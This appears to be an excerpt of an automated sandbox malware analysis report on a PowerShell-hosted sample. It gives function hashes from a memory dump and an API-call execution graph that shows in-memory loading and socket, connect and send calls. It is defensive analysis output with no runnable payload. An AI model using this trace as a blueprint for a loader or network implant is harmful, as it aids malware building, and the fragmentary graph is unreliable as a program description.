                                                                                                  Function 044B7697 Relevance: .0, Instructions: 31COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1352425125.00000000044B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_44b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: aa9d6970798f3aa3e0a44d331036376f04ae5651c8494324ff99df2e5d90dd89
                                                                                                  • Instruction ID: 15f043eb016efc749980b52931c95d539f15fa32881bab13ac7b0f43bd8f8884
                                                                                                  • Opcode Fuzzy Hash: aa9d6970798f3aa3e0a44d331036376f04ae5651c8494324ff99df2e5d90dd89
                                                                                                  • Instruction Fuzzy Hash: CDF0A7353001048FDF00EBAD98106DA77E2EFCD2517058159E409DB310DF34DC028BE0
                                                                                                  Function 044B90E8 Relevance: .0, Instructions: 31COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1352425125.00000000044B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_44b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d4033bcdca4279a1714a8e702f00d1b8f30f7badb498be2c76b7e0e9f755b6df
                                                                                                  • Instruction ID: 59c549fa79ee6c0cf00239a2f5aff75fee6560068ba8340c97aa171ec24983af
                                                                                                  • Opcode Fuzzy Hash: d4033bcdca4279a1714a8e702f00d1b8f30f7badb498be2c76b7e0e9f755b6df
                                                                                                  • Instruction Fuzzy Hash: 05F027B16041085BE714AB6DD0187AB7BA6DFC4718F20812AC90A4B384CE353845CBF1
                                                                                                  Function 044BDE48 Relevance: .0, Instructions: 30COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1352425125.00000000044B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_44b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 7d24504a3957293040e919d972592ed34f43081be50cf985651c964a818e34ac
                                                                                                  • Instruction ID: d54db3cf7a70422580026abc0c61f03773a077162785b8deb882bc385291f21e
                                                                                                  • Opcode Fuzzy Hash: 7d24504a3957293040e919d972592ed34f43081be50cf985651c964a818e34ac
                                                                                                  • Instruction Fuzzy Hash: C6E065797006008F87009B1DD888CA6B7FAEFCE62531900AAE589CB720DA21EC01CB90
                                                                                                  Function 044BAF88 Relevance: .0, Instructions: 28COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1352425125.00000000044B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_44b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e773d23c372502a196d6975d91b1801240576b1f5052b45c00dce24f2135b920
                                                                                                  • Instruction ID: 46bbd7fc0bf51d78a84c264af140526a0c4c5de88cb234cfd437927a1b38b19d
                                                                                                  • Opcode Fuzzy Hash: e773d23c372502a196d6975d91b1801240576b1f5052b45c00dce24f2135b920
                                                                                                  • Instruction Fuzzy Hash: 2AE04F22308395178F16916E78104E6AF678AC757030981BBE484DF347DC55998643E1
                                                                                                  Function 044B9549 Relevance: .0, Instructions: 25COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1352425125.00000000044B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_44b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 9268525d55d1bf0b7d665962d0693f2c844fc5318e30c938dc7a2db616a687e7
                                                                                                  • Instruction ID: c22a7d60148b85fc8bad8c594611a1195dd1be330fc482a2a370bfb3068f75af
                                                                                                  • Opcode Fuzzy Hash: 9268525d55d1bf0b7d665962d0693f2c844fc5318e30c938dc7a2db616a687e7
                                                                                                  • Instruction Fuzzy Hash: 95D02BD7741015239D5430BF1C002F779CF8AC20A4708013BDA44C3702EC10EC0503F2
                                                                                                  Function 044B9168 Relevance: .0, Instructions: 25COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1352425125.00000000044B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_44b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b24dcb2d51042c71b87eeb4bb583684c2b72b9117d0c8eedfd2615ed7a8d6d76
                                                                                                  • Instruction ID: 3e0eeca1793b3f18b1ed2980891cb0a9574a33ec9fbde1f2dc9edbb7667cf5c7
                                                                                                  • Opcode Fuzzy Hash: b24dcb2d51042c71b87eeb4bb583684c2b72b9117d0c8eedfd2615ed7a8d6d76
                                                                                                  • Instruction Fuzzy Hash: 7CF06D70A003048BD760DFB8D89C79A7BE5FB44320F404429E64EC7380DB396881CB90
                                                                                                  Function 044BF860 Relevance: .0, Instructions: 25COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1352425125.00000000044B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_44b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: c0f49e481ee0a726ea5418b079f92d1e4301df37586c210ff37f923a5cd907ec
                                                                                                  • Instruction ID: 6a9eafb2fce7185770b50f689e063b0841276862350fd0a9edfe1e1f30fdb78d
                                                                                                  • Opcode Fuzzy Hash: c0f49e481ee0a726ea5418b079f92d1e4301df37586c210ff37f923a5cd907ec
                                                                                                  • Instruction Fuzzy Hash: 66E01275D00259AF8F90EFB8884159AFBF4EB49200B1085AEDD48E7201E77156029BE1
                                                                                                  Function 044B8978 Relevance: .0, Instructions: 24COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1352425125.00000000044B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_44b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d9eaf99a08e4de169f853739c89e6099b25e5857c3c2030c29c6874cf1d38152
                                                                                                  • Instruction ID: 4fb58f2dd4c72854002cde63ebde44316c4c342d0d44ad50d6c1835e629f737c
                                                                                                  • Opcode Fuzzy Hash: d9eaf99a08e4de169f853739c89e6099b25e5857c3c2030c29c6874cf1d38152
                                                                                                  • Instruction Fuzzy Hash: C3E0263530421847DB093BB9A81D6AE7A56FBC8B35F41002ED60683381CF3C190283E9
                                                                                                  Function 044B9550 Relevance: .0, Instructions: 23COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1352425125.00000000044B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_44b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 4f59d0fbd8a268f621062a8c273c1d68abb69fdda2ad3a8eb821834c8f21b19c
                                                                                                  • Instruction ID: 2db5e3b2e25b7bb4d9c13816fe3ec89fc21cfdc43377eb9698984a6a0062f6ff
                                                                                                  • Opcode Fuzzy Hash: 4f59d0fbd8a268f621062a8c273c1d68abb69fdda2ad3a8eb821834c8f21b19c
                                                                                                  • Instruction Fuzzy Hash: CDD05ED374212927AE5530BB58006FBB9DF8AC64A4709413BDA89C3342EC50EC0503F1
                                                                                                  Function 044BDCE8 Relevance: .0, Instructions: 23COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1352425125.00000000044B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_44b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                                  • Instruction ID: 9ba583fee1646a601e8cbe8b26699a14a612b5427b6891de3dc2e5177fa78fcd
                                                                                                  • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                                  • Instruction Fuzzy Hash: 98E08631B10014978B1C9959D8104EDF7AADBCC220F04807FD94AA7340DA32691686E1
                                                                                                  Function 044BDC98 Relevance: .0, Instructions: 23COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1352425125.00000000044B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_44b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 57fc9897fa20426ecb39340c5006091e057492e7ff51e188512ab92703f24d0c
                                                                                                  • Instruction ID: b3aaedd12109caeda0e3b218ca48b4c83c5120d2d60ed4de2ce73ad985977675
                                                                                                  • Opcode Fuzzy Hash: 57fc9897fa20426ecb39340c5006091e057492e7ff51e188512ab92703f24d0c
                                                                                                  • Instruction Fuzzy Hash: E6E0C231B00714879712A7BEA9108DF77EADFC4571310802EE54AC7340DF64EC0647E5
                                                                                                  Function 044B8739 Relevance: .0, Instructions: 22COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1352425125.00000000044B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_44b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ff27912cb4072a8c52c79a9eaf9dd3f5c0d465831aa5ff5a268f15d7058303ea
                                                                                                  • Instruction ID: 352e8966e8b1f1e3a66f41861534c6a3cdbf2e71995d638256951a48665d1de1
                                                                                                  • Opcode Fuzzy Hash: ff27912cb4072a8c52c79a9eaf9dd3f5c0d465831aa5ff5a268f15d7058303ea
                                                                                                  • Instruction Fuzzy Hash: D6E0863580410D8BCB19BBB8F81B4FDBF34FB01311B01019AD942926C1DE321A87CAC1
                                                                                                  Function 044B8800 Relevance: .0, Instructions: 22COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1352425125.00000000044B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_44b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3d09eccd15a5b23ea84b59fdff6f73f0403c5c46113e19be92461a1a7c06ef38
                                                                                                  • Instruction ID: 241fdb6e29895877770b553aeeda65e690dcea0d1b681a923ad8d94b58ae18ba
                                                                                                  • Opcode Fuzzy Hash: 3d09eccd15a5b23ea84b59fdff6f73f0403c5c46113e19be92461a1a7c06ef38
                                                                                                  • Instruction Fuzzy Hash: 4CE04F3AA0820A9BCB24EB74E4475E9BFB5BB05215B004056DD4993780EA315996DBD2
                                                                                                  Function 044BF870 Relevance: .0, Instructions: 16COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1352425125.00000000044B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_44b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                  • Instruction ID: 22e9c3aaedff492f60d2e8575995154d43ab62e1099801af186731900e948423
                                                                                                  • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                  • Instruction Fuzzy Hash: 40D06270D042099F8780EFADC94156DFBF4EB48200F5085AA895DE7301F7315612DBD1
                                                                                                  Function 044B8748 Relevance: .0, Instructions: 15COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1352425125.00000000044B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_44b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 73948abedbbec14ad429f210d1bb0aae90a91bbdf7e6e12cc03b5c859fc68f58
                                                                                                  • Instruction ID: 7941d7235ffaca8aed13512e942c90c9ef3f21a64b55172c3592a1d202e0ee05
                                                                                                  • Opcode Fuzzy Hash: 73948abedbbec14ad429f210d1bb0aae90a91bbdf7e6e12cc03b5c859fc68f58
                                                                                                  • Instruction Fuzzy Hash: 10D0173080410D8BCB18ABB4E81B4BDBB34FA00301F4101A9D907522D0EB362A4BCAC1
                                                                                                  Function 044B8810 Relevance: .0, Instructions: 15COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1352425125.00000000044B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_44b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 99de61da98bc62085359227cf36e6b7992e2fb4f4ff755446bc8ffb3a5dcbb79
                                                                                                  • Instruction ID: 4a103f901824af736287a3d240301f77280f2c54f505ea4f2a73ac1e76bbf017
                                                                                                  • Opcode Fuzzy Hash: 99de61da98bc62085359227cf36e6b7992e2fb4f4ff755446bc8ffb3a5dcbb79
                                                                                                  • Instruction Fuzzy Hash: 0FD01234A0420E9BCB24EF64D44686DBBB4F744200F004156DD4593344EA305912DBD1
                                                                                                  Function 044B7932 Relevance: .0, Instructions: 11COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1352425125.00000000044B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_44b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 6b7e01db6546bd590b50cb9f2dd1815ac22e99dfcb76deb7303550d9f633e232
                                                                                                  • Instruction ID: c58c4ad14a17a7a02d57b403e8dc3e9d812d5bd10e09ea9dc1dca38c3a16c3b0
                                                                                                  • Opcode Fuzzy Hash: 6b7e01db6546bd590b50cb9f2dd1815ac22e99dfcb76deb7303550d9f633e232
                                                                                                  • Instruction Fuzzy Hash: EFD012B54483889BCB254F7C90D4D183F50AF52711F000ADDD8468A6A3CE36C049CF40
                                                                                                  Function 044B7EA0 Relevance: .0, Instructions: 10COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1352425125.00000000044B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_44b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 2b5a2ec7402b653d37d3f0c201a1d98a215710cb00dd3710717e9bfccb57aa27
                                                                                                  • Instruction ID: 3b592217a0cb191ae487f8d5d03d48024056a72719e4f060ebdc0d208c8ca5de
                                                                                                  • Opcode Fuzzy Hash: 2b5a2ec7402b653d37d3f0c201a1d98a215710cb00dd3710717e9bfccb57aa27
                                                                                                  • Instruction Fuzzy Hash: 09C04C769291404FEF08DB35886AA27BB325766605B06869EC04286894CE64800AEA01
                                                                                                  Function 044B7940 Relevance: .0, Instructions: 8COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1352425125.00000000044B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_44b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 843f91047d3690cc2891e4113d55c3b7818ea9473e6f2d2f0f4ab5a3674451e6
                                                                                                  • Instruction ID: 0b1b5af9d4f5500167921ef49f073477b3ca3abd3ab3c1307c2c64736d702ffe
                                                                                                  • Opcode Fuzzy Hash: 843f91047d3690cc2891e4113d55c3b7818ea9473e6f2d2f0f4ab5a3674451e6
                                                                                                  • Instruction Fuzzy Hash: A2B0923004870C8FC2586FB9A454829772DAF80715B8004A8E80E4A7A38F36E884CA94

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:4.8%
                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                  Signature Coverage:3.2%
                                                                                                  Total number of Nodes:629
                                                                                                  Total number of Limit Nodes:18
                                                                                                  execution_graph 48204 920032 48215 920ae4 GetPEB 48204->48215 48207 920ae4 GetPEB 48210 9202a7 48207->48210 48208 9204a6 GetNativeSystemInfo 48209 9204d3 VirtualAlloc 48208->48209 48213 920a02 48208->48213 48211 9204ec VirtualAlloc 48209->48211 48212 9204ff 48209->48212 48210->48208 48210->48213 48211->48212 48212->48212 48217 977813 48212->48217 48216 92029b 48215->48216 48216->48207 48218 977823 48217->48218 48219 97781e 48217->48219 48223 97771d 48218->48223 48231 97b54b GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 48219->48231 48222 977831 48222->48213 48224 977729 ___DllMainCRTStartup 48223->48224 48228 9777c6 ___DllMainCRTStartup 48224->48228 48229 977776 48224->48229 48232 9775b9 48224->48232 48226 9777a6 48227 9775b9 __CRT_INIT@12 149 API calls 48226->48227 48226->48228 48227->48228 48228->48222 48229->48226 48229->48228 48230 9775b9 __CRT_INIT@12 149 API calls 48229->48230 48230->48226 48231->48218 48233 9775c5 ___DllMainCRTStartup 48232->48233 48234 977647 48233->48234 48235 9775cd 48233->48235 48237 97764d 48234->48237 48238 9776a8 48234->48238 48284 97803b HeapCreate 48235->48284 48246 97766b 48237->48246 48272 9775d6 ___DllMainCRTStartup 48237->48272 48294 978306 66 API calls _doexit 48237->48294 48239 977706 48238->48239 48240 9776ad 48238->48240 48239->48272 48322 979a58 79 API calls __freefls@4 48239->48322 48299 979754 TlsGetValue 48240->48299 48241 9775d2 48243 9775dd 48241->48243 48241->48272 48285 979ac6 86 API calls 5 library calls 48243->48285 48247 97767f 48246->48247 48295 97b0e4 67 API calls _free 48246->48295 48298 977692 70 API calls __mtterm 48247->48298 48250 9775e2 __RTC_Initialize 48255 9775e6 48250->48255 48261 9775f2 GetCommandLineA 48250->48261 48286 978059 HeapDestroy 48255->48286 48256 977675 48296 9797a5 70 API calls _free 48256->48296 48257 9776ca DecodePointer 48262 9776df 48257->48262 48260 97767a 48297 978059 HeapDestroy 48260->48297 48287 97b468 71 API calls 2 library calls 48261->48287 48265 9776e3 48262->48265 48266 9776fa 48262->48266 48308 9797e2 48265->48308 48321 976e49 66 API calls 2 library calls 48266->48321 48267 977602 48288 97ae9f 73 API calls __calloc_crt 48267->48288 48271 9776ea GetCurrentThreadId 48271->48272 48272->48229 48273 97760c 48274 977610 48273->48274 48290 97b3ad 95 API calls 3 library calls 48273->48290 48289 9797a5 70 API calls _free 48274->48289 48277 97761c 48278 977630 48277->48278 48291 97b137 94 API calls 6 library calls 48277->48291 48283 9775eb 48278->48283 48293 97b0e4 67 API calls _free 48278->48293 48281 977625 48281->48278 48292 978119 77 API calls 4 library calls 48281->48292 48283->48272 48284->48241 48285->48250 48286->48283 48287->48267 48288->48273 48289->48255 48290->48277 48291->48281 48292->48278 48293->48274 48294->48246 48295->48256 48296->48260 48297->48247 48298->48272 48300 9776b2 48299->48300 48301 979769 DecodePointer TlsSetValue 48299->48301 48302 979fe4 48300->48302 48301->48300 48303 979fed 48302->48303 48305 9776be 48303->48305 48306 97a00b Sleep 48303->48306 48323 97e555 48303->48323 48305->48257 48305->48272 48307 97a020 48306->48307 48307->48303 48307->48305 48334 979db0 48308->48334 48310 9797ee GetModuleHandleW 48335 97c144 48310->48335 48312 97982c InterlockedIncrement 48342 979884 48312->48342 48315 97c144 __lock 64 API calls 48316 97984d 48315->48316 48345 97de7f InterlockedIncrement 48316->48345 48318 97986b 48357 97988d 48318->48357 48320 979878 ___DllMainCRTStartup 48320->48271 48321->48272 48322->48272 48324 97e561 48323->48324 48330 97e57c 48323->48330 48325 97e56d 48324->48325 48324->48330 48332 97710d 66 API calls __getptd_noexit 48325->48332 48327 97e58f HeapAlloc 48329 97e5b6 48327->48329 48327->48330 48328 97e572 48328->48303 48329->48303 48330->48327 48330->48329 48333 978550 DecodePointer 48330->48333 48332->48328 48333->48330 48334->48310 48336 97c16c EnterCriticalSection 48335->48336 48337 97c159 48335->48337 48336->48312 48360 97c082 66 API calls 9 library calls 48337->48360 48339 97c15f 48339->48336 48361 978315 66 API calls 3 library calls 48339->48361 48362 97c06b LeaveCriticalSection 48342->48362 48344 979846 48344->48315 48346 97dea0 48345->48346 48347 97de9d InterlockedIncrement 48345->48347 48348 97dead 48346->48348 48349 97deaa InterlockedIncrement 48346->48349 48347->48346 48350 97deb7 InterlockedIncrement 48348->48350 48351 97deba 48348->48351 48349->48348 48350->48351 48352 97dec4 InterlockedIncrement 48351->48352 48353 97dec7 48351->48353 48352->48353 48354 97dee0 InterlockedIncrement 48353->48354 48355 97def0 InterlockedIncrement 48353->48355 48356 97defb InterlockedIncrement 48353->48356 48354->48353 48355->48353 48356->48318 48363 97c06b LeaveCriticalSection 48357->48363 48359 979894 48359->48320 48360->48339 48362->48344 48363->48359 48364 974274 48365 98f814 CreateThread 48364->48365 48367 976110 48365->48367 48368 9900d5 48367->48368 48369 976013 48370 976045 48369->48370 48371 990003 48370->48371 48374 975e07 48370->48374 48377 97608a 48370->48377 48375 98f0f9 RegQueryValueExW 48374->48375 48376 973f35 __wcsrev 48375->48376 48376->48376 48378 9760a0 RegOpenKeyExW 48377->48378 48379 973f35 __wcsrev 48378->48379 48379->48379 48380 975eb2 Sleep 48383 976f17 48380->48383 48385 976f21 48383->48385 48386 975ec9 48385->48386 48390 976f3d std::exception::exception 48385->48390 48395 976e83 48385->48395 48412 978550 DecodePointer 48385->48412 48388 976f7b 48414 976e24 66 API calls std::exception::operator= 48388->48414 48390->48388 48413 9773e9 76 API calls __cinit 48390->48413 48391 976f85 48415 977836 RaiseException 48391->48415 48394 976f96 48396 976f00 48395->48396 48408 976e91 48395->48408 48422 978550 DecodePointer 48396->48422 48398 976e9c 48398->48408 48416 978508 66 API calls __NMSG_WRITE 48398->48416 48417 978359 66 API calls 6 library calls 48398->48417 48418 978098 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 48398->48418 48399 976f06 48423 97710d 66 API calls __getptd_noexit 48399->48423 48402 976ebf RtlAllocateHeap 48402->48408 48411 976ef8 48402->48411 48404 976eec 48420 97710d 66 API calls __getptd_noexit 48404->48420 48408->48398 48408->48402 48408->48404 48409 976eea 48408->48409 48419 978550 DecodePointer 48408->48419 48421 97710d 66 API calls __getptd_noexit 48409->48421 48411->48385 48412->48385 48413->48388 48414->48391 48415->48394 48416->48398 48417->48398 48419->48408 48420->48409 48421->48411 48422->48399 48423->48411 48424 98f63d send 48425 972d80 ResetEvent InterlockedExchange timeGetTime socket 48426 972dfc lstrlenW WideCharToMultiByte 48425->48426 48427 972de8 48425->48427 48446 9767ff 48426->48446 48479 976815 48427->48479 48430 972df6 48432 972e59 ctype 48433 972e96 48432->48433 48434 972e60 htons connect 48432->48434 48436 976815 __write_nolock 5 API calls 48433->48436 48434->48433 48435 972eab setsockopt setsockopt setsockopt setsockopt 48434->48435 48438 972f24 WSAIoctl 48435->48438 48439 972f52 InterlockedExchange 48435->48439 48437 972ea5 48436->48437 48438->48439 48458 97721b 48439->48458 48442 97721b 755 API calls 48443 972f91 48442->48443 48444 976815 __write_nolock 5 API calls 48443->48444 48445 972fa6 48444->48445 48448 976f17 48446->48448 48447 976e83 _malloc 66 API calls 48447->48448 48448->48447 48449 972e22 lstrlenW WideCharToMultiByte gethostbyname 48448->48449 48453 976f3d std::exception::exception 48448->48453 48487 978550 DecodePointer 48448->48487 48449->48432 48451 976f7b 48489 976e24 66 API calls std::exception::operator= 48451->48489 48453->48451 48488 9773e9 76 API calls __cinit 48453->48488 48454 976f85 48490 977836 RaiseException 48454->48490 48457 976f96 48459 97723f 48458->48459 48460 97722b 48458->48460 48461 979754 ___set_flsgetvalue 3 API calls 48459->48461 48496 97710d 66 API calls __getptd_noexit 48460->48496 48463 977245 48461->48463 48465 979fe4 __calloc_crt 66 API calls 48463->48465 48464 977230 48497 978702 11 API calls __write_nolock 48464->48497 48467 977251 48465->48467 48468 9772a2 48467->48468 48491 97990f 48467->48491 48498 976e49 66 API calls 2 library calls 48468->48498 48472 9772a8 48474 972f79 48472->48474 48499 977133 66 API calls 2 library calls 48472->48499 48473 9797e2 __getptd_noexit 66 API calls 48476 977267 CreateThread 48473->48476 48474->48442 48476->48474 48478 97729a GetLastError 48476->48478 48516 9771b6 48476->48516 48478->48468 48480 97681f IsDebuggerPresent 48479->48480 48481 97681d 48479->48481 48925 97b5e6 48480->48925 48481->48430 48484 97794f SetUnhandledExceptionFilter UnhandledExceptionFilter 48485 977974 GetCurrentProcess TerminateProcess 48484->48485 48486 97796c __call_reportfault 48484->48486 48485->48430 48486->48485 48487->48448 48488->48451 48489->48454 48490->48457 48500 979896 GetLastError 48491->48500 48493 979917 48494 97725e 48493->48494 48514 978315 66 API calls 3 library calls 48493->48514 48494->48473 48496->48464 48497->48474 48498->48472 48499->48474 48501 979754 ___set_flsgetvalue 3 API calls 48500->48501 48502 9798ad 48501->48502 48503 979903 SetLastError 48502->48503 48504 979fe4 __calloc_crt 62 API calls 48502->48504 48503->48493 48505 9798c1 48504->48505 48505->48503 48506 9798c9 DecodePointer 48505->48506 48507 9798de 48506->48507 48508 9798e2 48507->48508 48509 9798fa 48507->48509 48510 9797e2 __getptd_noexit 62 API calls 48508->48510 48515 976e49 66 API calls 2 library calls 48509->48515 48512 9798ea GetCurrentThreadId 48510->48512 48512->48503 48513 979900 48513->48503 48515->48513 48517 979754 ___set_flsgetvalue 3 API calls 48516->48517 48518 9771c1 48517->48518 48531 979734 TlsGetValue 48518->48531 48521 9771d0 48582 979788 DecodePointer 48521->48582 48522 9771fa 48533 979929 48522->48533 48524 977215 48569 977175 48524->48569 48527 9771df 48529 9771e3 GetLastError ExitThread 48527->48529 48530 9771f0 GetCurrentThreadId 48527->48530 48530->48524 48532 9771cc 48531->48532 48532->48521 48532->48522 48534 979935 ___DllMainCRTStartup 48533->48534 48535 979a37 ___DllMainCRTStartup 48534->48535 48537 97994d 48534->48537 48583 976e49 66 API calls 2 library calls 48534->48583 48535->48524 48542 97995b 48537->48542 48584 976e49 66 API calls 2 library calls 48537->48584 48540 979969 48541 979977 48540->48541 48586 976e49 66 API calls 2 library calls 48540->48586 48544 979985 48541->48544 48587 976e49 66 API calls 2 library calls 48541->48587 48542->48540 48585 976e49 66 API calls 2 library calls 48542->48585 48546 979993 48544->48546 48588 976e49 66 API calls 2 library calls 48544->48588 48547 9799a1 48546->48547 48589 976e49 66 API calls 2 library calls 48546->48589 48550 9799b2 